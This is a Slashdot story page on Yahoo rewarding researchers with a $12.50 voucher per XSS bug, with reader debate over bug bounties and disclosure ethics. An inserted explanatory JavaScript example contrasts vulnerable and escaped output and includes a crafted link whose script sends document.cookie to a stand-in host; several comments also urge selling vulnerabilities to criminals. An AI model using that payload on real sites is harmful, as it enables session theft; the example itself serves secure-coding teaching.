
Security Researchers Rewarded With $12.50 Voucher To Buy Yahoo T-Shirt

Unknown Lamer posted about a year ago | from the gimme-more-or-ill-hack-ur-serverz dept.

Security 138

Hugh Pickens DOT Com writes "More and more companies are offering Bug Bounty Programs remunerating security researchers for reporting vulnerabilities and weaknesses in their applications and software. Now security analyst Graham Cluley writes that researchers at High-Tech Bridge informed Yahoo's Security Team about three cross-site scripting (XSS) vulnerabilities affecting the ecom.yahoo.com and adserver.yahoo.com domains. According to High-Tech Bridge, each of the vulnerabilities could compromise *any* @yahoo.com email account. All that was required was that the victim, while logged into Yahoo, should click on a specially-crafted link received in an email. Forty-eight hours later, Yahoo had patched all of the vulnerabilities and Yahoo's security team responded, thanking the researchers and 'offering the mighty bounty of err.. $12.50 per vulnerability,' writes Cluley. But there was one catch. The $12.50 was given as a discount code that can only be used in the Yahoo Company Store, which sells Yahoo's corporate t-shirts, cups, pens and other accessories."
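The bug class in the summary is reflected XSS: a parameter carried in a crafted link is echoed into the page without encoding, so script from the link runs in the victim's logged-in origin and can read whatever that origin exposes. The following is an added example, not High-Tech Bridge's finding and not Yahoo's code; the ecom.example.test search endpoint, the q parameter, the attacker.test host and the sid cookie name are assumptions used only to illustrate the vulnerable handler beside its hardened form.

```javascript
// Added example: reflected XSS in a hypothetical search page beside its
// hardened form. Not Yahoo's code; endpoint, parameter and cookie names are
// assumptions used only for illustration.

// Escape the characters that change meaning in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: the query parameter is concatenated straight into the markup,
// so whatever the link carries becomes part of the page in the victim's origin.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// HARDENED: the untrusted value is encoded for its HTML context before output.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Stand-in for the server side of "victim clicks a crafted link": parse the
// URL, pull the attacker-controlled parameter and hand it to a renderer.
function handleRequest(url, render) {
  const q = new URL(url).searchParams.get("q") ?? "";
  return render(q);
}

// Crude check used by the demo: did a <script> element reach the response?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link (attacker.test is fictional). The payload ships the
// victim's cookies off-site, which is how "click this link" turns into
// "account compromised" when the session cookie is readable from script.
const CRAFTED_LINK =
  "https://ecom.example.test/search?q=" +
  encodeURIComponent(
    '<script>location="https://attacker.test/c?"+document.cookie</script>'
  );

// Second layer: even if an XSS slips through, a session cookie flagged HttpOnly
// is not exposed through document.cookie, so this particular payload gets nothing.
function sessionCookieHeader(token) {
  return `sid=${token}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Demo output: the vulnerable renderer echoes the script, the hardened one
// shows it as harmless text.
console.log("vulnerable:", handleRequest(CRAFTED_LINK, renderSearchVulnerable));
console.log("hardened:  ", handleRequest(CRAFTED_LINK, renderSearchSafe));
console.log("cookie:    ", sessionCookieHeader("0123abcd"));
```

Output encoding has to match the context the value lands in (HTML text here; a URL, attribute or JavaScript context each needs its own encoder), and HttpOnly only protects the cookie value, not actions the script can take while the page is open, so it complements the fix rather than replacing it.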


So . . . (1)

Mitchell314 (1576581) | about a year ago | (#44999701)

What's the problem? :P

Re:So . . . (5, Funny)

kthreadd (1558445) | about a year ago | (#44999813)

Have you seen the new Yahoo logo?

Re: So . . . (0)

Anonymous Coward | about a year ago | (#45000097)

Uninspired, shallow. See the smart people jumping ship soon.

Re: So . . . (1)

sonamchauhan (587356) | about a year ago | (#45000709)

"Have you seen the new Yahoo logo?

That's smart... see the uninspired, shallow people jumping the ship soon."

Seriously, it's a silly logo and all that jazz, but wouldn't you leave a company because it is no longer the right employer? *

* Where right_employer = (pay && boss && peers && benefits && work_conditions && commute && ! good_self_employment_prospects)

And not because the logo was terrible?

Re: So . . . (0)

Anonymous Coward | about a year ago | (#45001219)

If that was bad, my check from my boss bounced!

Re: So . . . (0)

Anonymous Coward | about a year ago | (#45002753)

Smart people are long gone from Yahoo!

Re:So . . . (-1, Flamebait)

TWiTfan (2887093) | about a year ago | (#45001217)

Come on, they have a woman in charge now. You're surprised they value appearances over substance?

Now, go on and mod me down. You know there's truth in what I'm saying, you're just too PC to admit it.

Re:So . . . (0)

Anonymous Coward | about a year ago | (#45002269)

Come on, they have a woman in charge now.

Poor little MRA, huddling in his parents' basement. Are you going to Chuck-E-Cheese's for your 40th?

Re:So . . . (-1, Troll)

TWiTfan (2887093) | about a year ago | (#45002721)

Are you going to Chuck-E-Cheese's for your 40th?

Are you going down to the ghetto to apologize for yours?

Re:So . . . (1)

datavirtue (1104259) | about a year ago | (#45005359)

Yahoo with its new zipper logo strikes me as one of those parking pages that serves lame, untargeted ads.

Re:So . . . (5, Funny)

mwvdlee (775178) | about a year ago | (#44999817)

Surely they sell a T-shirt that reads "I saved Yahoo! public embarrassment, millions of dollars in damages and all I got was this lousy T-shirt".

Re:So . . . (1)

slashmydots (2189826) | about a year ago | (#45001481)

Considering how many Yahoo accounts I know that got hacked (probably double digit percentages of all that exist), they didn't necessarily "save" them from anything. They "bailed them out of a class 5 shitstorm" maybe.

Re:So . . . (1)

davester666 (731373) | about a year ago | (#45004841)

No, they didn't bail them out of anything. Yahoo is in the middle of their "hey, let's recycle old user email names that haven't been logged into recently. What could go wrong?" debacle.

Re:So . . . (1)

idontgno (624372) | about a year ago | (#45003509)

Depending on the T-shirt [yahoo.com], the slogan might have to say "I saved Yahoo! public embarrassment and millions of dollars in damages, and all I got was a discount on this lousy T-shirt." to be perfectly accurate.

Re:So . . . (3, Funny)

Anonymous Coward | about a year ago | (#44999869)

There weren't any in XXL.

Re:So . . . (4, Funny)

squiggleslash (241428) | about a year ago | (#45000757)

I know, at least Yahoo! didn't insult them by offering them a job at Yahoo! or something...

Re:So . . . (4, Insightful)

buchner.johannes (1139593) | about a year ago | (#45001393)

At least Yahoo! thanked them explicitly and didn't threaten to sue them.

Re:So . . . (4, Informative)

hairyfeet (841228) | about a year ago | (#45002595)

The problem is that Yahoo just sent out a message to every grey hat, letting them know "if you want anything other than a T-shirt, talk to the metasploit guys" and ya know what? They will. It's not just about the money, it's about respect. A t-shirt is the kind of prize you get from some DJ standing on a street corner, NOT what you get for saving a company endless bad press and possibly millions in pissed off users.

Of course the real bitch isn't just the XSS, it's when you mix that with an insecure browser that you get a real perfect shitstorm. See my journal for what I labeled the "Yahoo porn bug" a couple years back: if you take Yahoo and ONLY Yahoo (didn't see this with either Gmail or Live mail) and Firefox, which again is ONLY FF (not any of the Chromium or WebKit browsers, nor Opera nor IE), put them together and what do you get? You get the ability for spammers to spam entire address books without having any real access at all. They do this by using the fact that FF runs at the same permission level as the user (which is retarded but Moz refuses to fix; Chromium had the ability to run below user permission more than 6 years ago) and with a hidden iFrame and using the FF auto login (or even just a still valid cookie) they could have access to the entire address book without having to break into the account or even send a drop of data back to themselves.

So as I've been saying for a few years now, Yahoo really needs to get their shit together, it's entirely too easy to use Yahoo email addresses for spamming. The same can be said of Moz, I no longer include any gecko based browsers specifically because they refuse to add low rights mode. Bad security practices are bad practices, and insulting those that find bugs by giving them a lousy $12.50 t-shirt? They have made sure the next bug found by a grey hat will only be found out by Yahoo when they are getting pwned.

This is news? (4, Insightful)

Anonymous Coward | about a year ago | (#44999739)

They had many choices, simple two choices: Report bug and get $12.50, amazing yahoo was not giving them tree fidy. They could have gone onto some darknets and sold the report for $100,000+. The choice was theirs to make.

Re:This is news? (5, Insightful)

Dexter Herbivore (1322345) | about a year ago | (#44999835)

They had many choices, simple two choices: Report bug and get $12.50, amazing yahoo was not giving them tree fidy. They could have gone onto some darknets and sold the report for $100,000+. The choice was theirs to make.

Which is exactly why Yahoo should have paid them more. Make the choice less obvious and save themselves a lot of grief further down the line.

Re:This is news? (5, Insightful)

Sockatume (732728) | about a year ago | (#45001079)

Or paid them nothing. A small material reward is often more insulting than no reward but having done the right thing.

Re:This is news? (4, Insightful)

CODiNE (27417) | about a year ago | (#45002865)

When a diner doesn't leave a tip the waiter can reason "Maybe they forgot".

Now when the diner leaves a nickel on the table....

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45002867)

As someone that has recently walked out on years of employment and burned a bridge because of a thirteen cent raise, I agree.

The worst of it is the same in this case. Someone decided the exact amount of my raise just as someone decided exactly what these security researchers get. Somebody had to decide that thirteen dollars was too much, but twelve dollars was too little. Someone made that decision and thought it was the right thing to do. It is a slap in the face with a glove instead of a handshake.

Re:This is news? (4, Insightful)

6Yankee (597075) | about a year ago | (#45002873)

Absolutely.

When I worked in McJail, the grease trap exploded on one of my night shifts. BLAM! Couldn't use the sinks, and (once it had all rained back down from the ceiling and flowed down the walls) the back-room was ankle deep in nasty. In order to get the place ship-shape for the morning, I took all the dirty equipment to the local gas station and jet-washed it on my own dime, after rolling in the grease trying to unblock the pipe with my bare hands. While the other two put the rest of the store in order and went home, I was still there three hours after the end of my shift, cleaning up the mess as fast as it could drip from my body.

The store manager gave me a warm and heart-felt thank-you, although she had the good sense to refrain from shaking my hand. Then she gave me a present. It was the free plastic pen that the plumber had given her.

From there on in, every time I was tempted to go above and beyond the call of duty, I thought of that pen. That was ten years ago, and I still have it somewhere as a reminder.

Re:This is news? (1)

Anonymous Coward | about a year ago | (#45003575)

Wow you were quite the sucker at the time. It's a shame that we all need go learn the lesson that on average corporations and management don't really care about us. You're just another brick in the wall.

Re:This is news? (1)

MickLinux (579158) | about a year ago | (#45004115)

Quote from Farmer Boy (Laura Ingalls Wilder): "Keep your nickel; I can't make change."

Re:This is news? (3, Insightful)

rapiddescent (572442) | about a year ago | (#44999903)

At my local OWASP chapter meeting some months ago, we did a show of hands about how many people had reported via the pay-for-security-bug middlemen organisations rather than contacting the vendor/website directly. About 30% put their hands up. I was quite astounded, although, having been threatened legally myself when I called in a bug I found on an eComm website, I would no longer go directly to the owner of the system unless I had a contract in place already. The money is apparently quite good; so long as you don't care who is using the bug...

Re:This is news? (3, Insightful)

Joining Yet Again (2992179) | about a year ago | (#45000009)

Oh, for fuck's sake, this argument is just awful. "Well, people SHOULD pay protection money, because otherwise anyone with enough strength might break their legs."

This is mafia reasoning, and it's shameful that geeks are increasingly engaging in this sort of argument.

Guess what? I can also break into most people's houses and nick their stuff without getting caught. They have ground floor windows, old doors, &c. That doesn't mean they owe me anything for NOT doing that, nor for sending them unsolicited notices that it would be easy to take their stuff. Indeed, English law at least is comfortable with the idea that you never owe anything for unsolicited work, even if it's beneficial. No one was making these "hackers" do the work - they were either bored or wanted the notoriety.

Re:This is news? (1)

Anonymous Coward | about a year ago | (#45000463)

Oh, for fuck's sake, this argument is just awful. "Well, people SHOULD pay protection money, because otherwise anyone with enough strength might break their legs."

Actually, companies SHOULD pay for proper security, be it their own staff, contractors or "independent" security researchers. Since nothing ever happens to these companies WHEN they expose customer information WHEN they get hacked I have no sympathy for them at all. If you act irresponsibly then you don't get to cry about the results.

Re:This is news? (2)

Joining Yet Again (2992179) | about a year ago | (#45000535)

I'm not sure what cognitive fault causes people to blame the victim, but it seems like a common thought process.

Yes, companies should take more care with data (or, more widely, people should stop putting their data in the hands of random private businesses).

No, that doesn't mean it's their fault when someone malicious takes the data.

No, protection money is never an acceptable demand.

Re:This is news? (5, Insightful)

chaboud (231590) | about a year ago | (#45000589)

There is no cognitive fault, but instead, a conditioned, and, frankly, dangerous, view of software as protected by legal remedy. This idea has left us with shit software supported by careless organizations propagating paper-thin security already compromised by rafts of governments. A network is a dangerous place, and software and hardware should treat networks like the wild west when it comes to privacy/security.

On your other point, regarding "protection money," the reasoning is rather simple. People respond to incentives. If hackers have little to no financial reason to disclose a vulnerability to Yahoo, some may be motivated to find other ways to monetize their efforts. Forget legality/morality for a second and just think about incentives. What Yahoo is doing is removing their incentive for responsible disclosure. By providing a T-Shirt voucher, they're probably incentivizing attack by otherwise disinterested parties, just for the middle-finger of it all.

Re:This is news? (1, Insightful)

Joining Yet Again (2992179) | about a year ago | (#45000919)

Forget legality/morality for a second

No, that's an awful idea.

and just think about incentives.

My incentive is that I build a better society through responsible disclosure. Morality helps me reach that conclusion.

Re:This is news? (1)

TrollheartBlue (2944865) | about a year ago | (#45002345)

My incentive is that I build a better society through responsible disclosure. Morality helps me reach that conclusion.

That's you though with your morality. There are plenty of skilled people out there who don't care about building a better society or who have different moralities. There is no one "right" morality. I think your fallacy is believing that you hold a universal world view.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003235)

There are plenty of skilled people out there who don't care about building a better society or who have different moralities.

And they must be dealt with, not pandered to.

Re:This is news? (2)

war4peace (1628283) | about a year ago | (#45002567)

Think of it from another angle.
The money incentive is good enough of a reason to start researching. It's a matter of choice: between companies A, B and C, where A definitely offers a reward, B "might" offer you something crappy and C gives you the finger or even worse, sues you, WHAT would you choose? It's equally moral to research for all the above companies, and equally moral to provide them the results; I agree with that. But then, once the moral equality exists, you look at other parts of the deal, and pick the best one.

THAT is where Yahoo loses.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003651)

Erm, bounties aren't a good reason to start security research. "Bounty hunting" is a primitive form of compensation which is usually supplanted by more stable, reliable arrangements for all parties.

If you're good at that sort of thing, you get a perm job, being paid the money Yahoo would allocate to employees rather than PR exercises.

I mean I think Yahoo has been pointless since before the turn of the millennium, but that's another matter...

Re:This is news? (1)

war4peace (1628283) | about a year ago | (#45004443)

Erm, bounties aren't a good reason to start security research

No, they're a good reason to pick which one to research, out of many options otherwise equal.
It's like this: I have a lawn mower, and in front of me there are three houses which need mowing. Should I pick the one where the owner gives me 10 bucks, the one where he gives me a "thanks" or the one where the guy chases me down the road with a shotgun, shooting salt pellets at my ass?

If you're good at that sort of thing, you get a perm job, being paid the money Yahoo would allocate to employees rather than PR exercises.

That's outside the scope of the conversation. Maybe you already have that job and are doing extra stuff for fun. Fun is in all cases, but the extra small cash you make is the glazing on the cake. Or you could go banzai and pick the company which would sue you. Living on the edge is the thing for some people.

Re:This is news? (1)

Anonymous Coward | about a year ago | (#45002789)

Yahoo has ensured that the next time someone finds a vulnerability in their webpage, it will go up for sale only to criminal organizations. You can argue until you're blue in the face about what should be, but that doesn't have an impact on what is.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003471)

Just because you're a cunt, it doesn't mean everyone who finds a vulnerability is.

Re:This is news? (1)

ToddInSF (765534) | about a year ago | (#45005085)

I'd like to see hackers go after Yahoo's CEO and board members. Embarass them all. Get them all fired.

As a matter of fact, I'd like to see this done to many corporations. It's really the last avenue free people have in our new tech totalitarian corporatogovernment fascism.

Re:This is news? (4, Insightful)

AmiMoJo (196126) | about a year ago | (#45000795)

I see it differently. In real life we pay for cops via taxes. Part of their job is to offer advice and even survey your home for ways that criminals might break in. It's part of the service.

The internet doesn't have cops, but it does have criminals. Fortunately there are good guys who are willing to report flaws when they see them. Unfortunately many companies react to this helpful advice by threatening to sue or even trying to have the white hat arrested. Bug bounties make it clear that the company sees reporting as a valuable service and intends to act swiftly on reported problems.

Bug bounties also encourage people to look for issues from the outside, which is apparently quite valuable since the people on the inside seem to miss them quite often.

Companies should pay bug bounties when the issue is security, not as a kind of protection money but as a way of saying they take security seriously and wish to reward those who help them with it.

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45000961)

The internet doesn't have cops

Erm, yes it does. Law enforcement are as aware of the Internet as anything else. Perhaps they misallocate resources, and perhaps that's what you need to concentrate on fixing.

Unfortunately many companies react to this helpful advice by threatening to sue or even trying to have the white hat arrested.

Anonymous reporting is easy. If you attach your name to a public report then you're really using the threat of crime for personal profit. Try not to think about it from the PoV of the ego of the hacker.

Companies should pay bug bounties when the issue is security

They're welcome to offer them, although it's really more a PR thing "We're already so secure that we only expect to pay out a small amount from this fund." It's not really a significant method of fixing bugs in your product.

Re:This is news? (1)

TheRealMindChild (743925) | about a year ago | (#45001105)

Part of their job is to offer advice and even survey your home for ways that criminals might break in.

No, sir. Their job is to collect evidence of a crime. Their job is not to protect and serve. Their job is to send the bad guys to jail

Re:This is news? (2, Informative)

Lumpy (12016) | about a year ago | (#45001303)

"I see it differently. In real life we pay for cops via taxes. Part of their job is to offer advice and even survey your home for ways that criminals might break in. It's part of the service."

What utopia is that that you live in? Because here in the USA they do not do this at all. The police advice to me is, "do not own a weapon, in the case of a home invasion hide under your bed and call the police. Do not fortify your doors and windows as that is a crime."

Yes, Fortification of doors and windows in the USA is a CRIME. It makes it harder for cops to raid your home if they need to.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45002265)

What state do you live in cause I will not move there... I can fortify my doors and windows all I want so long as there is a fire exit. {AKA you have to be able to open them from inside in the event of an emergency}

Re:This is news? (1)

Lumpy (12016) | about a year ago | (#45003549)

Oklahoma, Michigan, Wisconsin, Illinois all have laws on the books to make home fortification illegal. I am certain there are more out there.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45003593)

where a felony offense prohibited by the Uniform Controlled Dangerous Substances Act is being committed, or attempted, and the fortification is for the purpose of preventing or delaying entry or access by a law enforcement officer, or to harm or injure a law enforcement officer.

Bars on your door or windows are considered there to delay access by an officer. and they WILL use that law against you.

Re:This is news? (1)

Wycliffe (116160) | about a year ago | (#45001449)

> In real life we pay for cops via taxes. Part of their job is to offer advice and even survey your home for ways that criminals might break in. It's part of the service.

Where are you located? I've never heard of public cops giving home inspections. I've had ADT, etc. give advice (i.e. try to sell me stuff) and I've even had landscapers give advice (again, try to sell me on work), but I've never heard of public cops giving home audits. The only home audits I've heard of in the USA are energy audits which are sometimes free to some people if they are low income or live in certain areas. The only advice I've even seen from cops, etc. are signs or announcements that state things like "lock your car doors, don't leave valuables in plain sight". Other than possibly getting off-the-cuff recommendations AFTER a break-in occurs, where have you heard of cops doing surveys and giving advice on how to prevent break-ins?

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45002049)

I'm sorry, if you worked for me and had 10k lying in plain sight on a counter in a busy store... I would fire you even if it doesn't get stolen. It doesn't matter to me that you didn't do it intentionally; you have created an undesired and very unnecessary dangerous situation.

The guy that tells me you did it is not a racketeer and if I want to relate it to the article he is the security guard next door. {He doesn't work for me and is not obligated to provide security for me but he is a security professional and did anyway, I would throw him a few dollars}

Re:This is news? (1)

Joining Yet Again (2992179) | about a year ago | (#45003687)

The guy who merely tells you is not a racketeer.

The guy who threatens to commit a crime against you if you don't pay him money IS a racketeer.

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45004215)

I'm not sure what cognitive fault causes people to blame the victim, but it seems like a common thought process.

Yes, companies should take more care with data (or, more widely, people should stop putting their data in the hands of random private businesses).

No, that doesn't mean it's their fault when someone malicious takes the data.

No, protection money is never an acceptable demand.

They're no longer the victim when they cross the line into negligence. This is even codified into law, many, many times.

So you want their work for free???? (0)

Anonymous Coward | about a year ago | (#45000539)

COMMUNIST!

As long as the beneficiary is a corporation, that is...

Sorry, you wanted work done, you should pay for it. you get what you pay for and how much work do you want for $12.50 that is not even worth that since you can at least pay rent with cash. Pay your landlord with a voucher instead and see how much it's worth...

Re:This is news? (0)

Anonymous Coward | about a year ago | (#45000887)

How about being paid for time and expertise? Take the average salary of a software developer at yahoo and the average time it takes to find it, double the number, and offer it as a reward.

They didn't pay their people to find it and they didn't pay the people who did find it. The exploit was worth thousands of dollars on the free market and took hours of time to find. This behavior encourages taking business elsewhere.

Re:This is news? (1)

Capt.Albatross (1301561) | about a year ago | (#45001507)

Oh, for fuck's sake, this argument is just awful. "Well, people SHOULD pay protection money, because otherwise anyone with enough strength might break their legs."

You must be a philosopher, because your analysis, and the course of action that you derive from it, is only valid in a possible world that we don't live in. In the real world, society incurs expenses all the time to protect itself from malicious parties. Last time I bought a car, they were still putting locks on them. If you want to get worked up over this, you should start with the defense budget of the nation you live in.

Re:This is news? (1)

Maxo-Texas (864189) | about a year ago | (#45000555)

http://news.yahoo.com/yahoo-ceo-ranked-2nd-companys-2012-pay-scale-001129756.html [yahoo.com]

Regulatory documents filed Tuesday revealed that Mayer received a pay package valued at $36.6 million last year. Most of the compensation consisted of stock awards that Mayer got in July when she ended a 13-year stint as a top Google executive to become Yahoo's CEO.

Most of the components of Mayer's pay had been previously disclosed.

It wasn't previously known that Mayer ranked second on Yahoo Inc.'s pay scale last year.

Henrique de Castro, another former Google Inc. executive who became Yahoo's chief operating officer in November, eclipsed Mayer with a compensation package valued at $39.2 million.

Why do people still do this anymore? (1)

Anonymous Coward | about a year ago | (#44999741)

Don't you know that security vulnerabilities go into the NSA arsenal before they are fixed? Why do you still do "responsible disclosure"? Why do you work with the vendors at all? Security vulnerabilities are valuable, but you're propping up a corrupt system and get only peanuts in return, if anything. The NSA does not have moral hangups about their war on the internet. They use what you give them to undermine any and all security protocols. The only problem that companies like Yahoo have with cooperating is when they're found out. They have no shame, only interests.

Re: Why do people still do this anymore? (1)

cripkd (709136) | about a year ago | (#44999833)

And the solution is?
No, really, aside from words and speeches made as if you're wearing a V mask.

Re: Why do people still do this anymore? (1, Insightful)

Anonymous Coward | about a year ago | (#44999841)

Sell them.

Re: Why do people still do this anymore? (1)

Anonymous Coward | about a year ago | (#44999909)

In which case the buyer might just be a straw man for the NSA.
So your choice basically is: Tell the company and risk that the NSA gets it as well, or sell it and risk that only the NSA gets it. Now, which one is more responsible?

Re: Why do people still do this anymore? (1)

chaboud (231590) | about a year ago | (#45000595)

Well, you still have it. It's a vulnerability, not a teddy bear.

Re: Why do people still do this anymore? (1)

cripkd (709136) | about a year ago | (#45000161)

How does that fix the problem? That's what solution means.

Solution: Don't look. (0)

Anonymous Coward | about a year ago | (#45000761)

If you can't be bothered to sell to a spammer, or don't have connections to sell it on the darknet, then don't do the work.

However, that doesn't solve the problem of security holes being in Yahoo services either. But that's Yahoo's fault.

They could also just ignore telling Yahoo at all and tell EVERYONE about it. Then people know Yahoo is insecure and can stop using it. The problem here is why should someone care to spend their time on searching and telling Yahoo alone about the bugs?

Re:Why do people still do this anymore? (3, Informative)

Anonymous Coward | about a year ago | (#45000149)

Which part of "Forty-eight hours later, Yahoo had patched all of the vulnerabilities" did you miss?

If you want to object here, then get that tinfoil hat straight and get some sharper Occam's razor.

Seriously, if you think "bug reported to Yahoo -> NSA demands it from Yahoo -> NSA quickly uses it to hack Yahoo's accounts in 2 days -> Yahoo patches it" is realistic, then you should realize that "NSA demands access to Yahoo accounts -> NSA leisurely browses through all Yahoo accounts they want" would be much more plausible.

FFS, learn the fucking difference between software on your PC and web services at least. In the latter case, govt spooks won't need any vulnerabilities if it comes to that - they can just come with a subpoena/NSL/whatever.

They must have an exclusive store (5, Funny)

viperidaenz (2515578) | about a year ago | (#44999759)

With the tshirt that says "I found a vulnerability and all I got was this lousy T-Shirt"

Re:They must have an exclusive store (1)

Anonymous Coward | about a year ago | (#44999851)

With the tshirt that says "I found a vulnerability and all I got was this lousy T-Shirt"

Or a T-shirt which says "I found a bug and all I got was this lousy mug".

Re:They must have an exclusive store (-1)

Anonymous Coward | about a year ago | (#44999961)

would mod you unfunny if there was an option for that

Re:They must have an exclusive store (3, Interesting)

antifoidulus (807088) | about a year ago | (#45000003)

Considering the ROI on security bug bounties, they really should have one that just has a Yahoo! logo and the text "I'm with stupid"

Re:They must have an exclusive store (0)

Anonymous Coward | about a year ago | (#45000427)

With the tshirt that says "I found a vulnerability and all I got was this lousy T-Shirt"

I wouldn't be surprised if that t-shirt costs $25 or more at the Yahoo store.

Re:They must have an exclusive store (1)

Reibisch (1261448) | about a year ago | (#45000923)

They'll also send a W2.

Freaking cheap .. (0)

Anonymous Coward | about a year ago | (#44999829)

what kind of cheap a&&ed finished plated poor 4 sides kind of reward is this ? honesty truly does not pay :\
Come on Yahoo . .at least fork over a complete , stitched and sewn together " We're cheap " tshirt.
How insulting it is to get that kind of reward :\ Might as well be a slap in the face and a kick in the crotch.

Wait! (0)

cripkd (709136) | about a year ago | (#44999845)

You don't know what 12.5 is ?!?
And you call yourselves geeks... Ahahahaha!

Re:Wait! (0)

Anonymous Coward | about a year ago | (#44999879)

Educate us, then. And let me educate you on how to correctly use punctuation: Question marks do not have a leading space. You look ridiculously French that way, in addition to sounding like a 14 y/o due to that "Ahahahahahah!"

Re:Wait! (0)

cripkd (709136) | about a year ago | (#45000215)

Swoosh!
See? No trailing space. I learned MY lesson. You should google humor in general, irony in particular.

Re:Wait! (0)

Anonymous Coward | about a year ago | (#45003155)

I think you may need to look up humor. There does not appear to be anything funny in your post, perhaps you just left it out?

Re:Wait! (0)

Anonymous Coward | about a year ago | (#45000021)

100/8. Your point?

Better idea (1)

atari2600a (1892574) | about a year ago | (#44999859)

Why not half of what an exploit like that could cost on the black market, because that's how much it'll cost to even begin to look like anyone will pay attention to their 'bug bounty program'.

Better than Microsoft (remember this story?) (3, Interesting)

Anonymous Coward | about a year ago | (#44999949)

When Microsoft lost their Hotmail domain name, some guy snatched it and kindly returned it to Microsoft because he thought it was the right thing to do, to protect Microsoft from their stupidity. Well, Microsoft sent him a personal thank you note and that was all. Yep, the guy could have legally resold the domain for like a billion dollars (wouldn't be the first time.. ahem, live.com) and gotten away with it. All he got was a lousy certificate of gratitude.

Re:Better than Microsoft (remember this story?) (3, Informative)

Anonymous Coward | about a year ago | (#45000815)

You mean this guy [doublewide.net] who got a cheque for $500 and a bunch of software for a problem that took him 2 minutes and $35 to address?

Re:Better than Microsoft (remember this story?) (1)

sl4shd0rk (755837) | about a year ago | (#45001727)

All he got was a lousy certificate of gratitude.

Maybe all the people using hotmail could pony up $2.00 for the guy. After all, they are the ones who would really be affected should the domain be sold.

Not bad (5, Funny)

Anonymous Coward | about a year ago | (#44999973)

C'mon. This is WAY better than the Standard Operation Practice: suing them into the ground.

We're moving forward, it seems.

Quit whining. (0)

Anonymous Coward | about a year ago | (#44999979)

No-one forced you to fix any bugs. If you want to be a 'security researcher', either fix bugs for people who have said that they want you to and will pay you, suck up the $12.50, or do 'full disclosure' (and get nothing but the kudos).

Don't play by the rules, then come whining when you don't like what you get. The internet is not your personal army.

If you don't like the way it is, try being a street sweeper instead. (Note that here too, you usually have to have a prior agreement with a municipality to clean the specific streets they want you to and get paid for it. You can't just sweep the streets you choose and then hassle the owners for cash.)

Re:Quit whining. (2)

Provocateur (133110) | about a year ago | (#45003115)

The vouchers are traceable. The REAL reward is coming AFTER the winner or researcher tries to claim it or use it at the store. Supply your own ending e.g. Congratulations, here's your new office...

So, where's the screwup? (0)

Anonymous Coward | about a year ago | (#44999983)

Well, $12.50 is certainly not worth the time and effort. But it's not like the researchers could easily or legally sell the information for a bigger profit. Having invested the time, they would've earned more fame/respect disclosing the vulnerabilities to the public.

Where's the major failure here? Well, the researchers should not have sold their research to yahoo for $12.50.

More fundamentally, for $12.50 a vuln, no reasonable person would expect yahoo to ever receive a notice via this system. Yahoo, however, has a monopoly as the only interested party and all they offer is $12.50. Take it or leave it.

I'd suggest finding a shady Russian bar and explain that you have services to offer to the organized crime syndicate to the bartender. The bartender will likely tell you to fuck off and that he knows nothing about this. Buy a drink and wait. Someone will speak to you.*

*: This may fail terribly.

Re:So, where's the screwup? (1)

Captain Hook (923766) | about a year ago | (#45000419)

Yahoo, however, has a monopoly as the only interested party ..... I'd suggest finding a shady Russian bar and explain that you have services to offer

But that is the whole point, Yahoo hasn't got a monopoly because they aren't the only interested party.

Next time, the researchers (not just these guys, but researchers in general) are going to ask why they should give Yahoo first bid when they know it's going to lead to nothing but an insult for their efforts.

That seems fine (1)

HalAtWork (926717) | about a year ago | (#45000039)

There was no expectation in the beginning except to get the problem solved, and that's what happened. Do you want them to hold the vulnerabilities for ransom or something? Maybe in the future some good samaritan will help you out with one of your problems too. Think of all the users you have helped out as well.

Re:That seems fine (1)

mysidia (191772) | about a year ago | (#45000917)

There was no expectation in the beginning except to get the problem solved, and that's what happened. Do you want them to hold the vulnerabilities for ransom or something?

Well... they didn't have to hold them for ransom; they could very well have taken the vulnerability to various dark spots on the internet and marketed it. I imagine they could easily get a few hundred K selling a vulnerability like that on the open market.

Re:That seems fine (1)

Gavagai80 (1275204) | about a year ago | (#45001149)

You could make a lot of money auctioning information about all your neighbors and their valuables and schedules to local burglars too.

Re:That seems fine (1)

Gibgezr (2025238) | about a year ago | (#45003759)

Could you point me towards more information on this? I like the sound of this "sell out my neighbours on ebay" plan. Not all my neighbours, mind you, just one in particular.

It's not Yahoo's work. (1)

Anonymous Coward | about a year ago | (#45001127)

Why do you think that if someone finds a vulnerability in Yahoo's stuff their efforts now belong to Yahoo? What if the person just doesn't want to give it to Yahoo? Do you think that their work should be taken from them summarily? Maybe in the future, only those willing and able to sell the vulnerability to scammers and criminals will be the ones looking because the others had to find some other work that pays bills.

Where does it say... (0)

Anonymous Coward | about a year ago | (#45000073)

.. that the bounty has to be a large financial reward?

Why do I start thinking Portal 2 (0)

Anonymous Coward | about a year ago | (#45000277)

The testing area is just up ahead. The quicker you get through, the quicker you'll get your 60 bucks. Caroline, are the compensation vouchers ready?

-Cave Johnson

Motivation (1)

Anonymous Coward | about a year ago | (#45000443)

I think Yahoo acted correctly in this case. I think paying people too much for bugs will distort the security landscape. The reason is security is an issue about the common good. No vulnerability is good... even if it is in your competitors' products. We should have a culture of assisting with security issues without expecting money for it.

What will we have? People selling vulnerabilities to the highest bidder which is socially acceptable? Note that the word here is social, NOT commercial.

Of course security researchers need to get paid... but I think there are other ways that will be more effective and more thorough. Grants to universities for security research, dedicated employees/teams focusing on security and possibly even government/industry bodies funded by tax and/or membership fees. And focus on security where the impact is the biggest... not on what gets the most headlines....

Re:Motivation (0)

Anonymous Coward | about a year ago | (#45000971)

That might be the case in a perfect world. Nowadays however we already have large black markets for vulnerabilities, so if the legitimate players offer bounties, they're at most leveling the playing field.
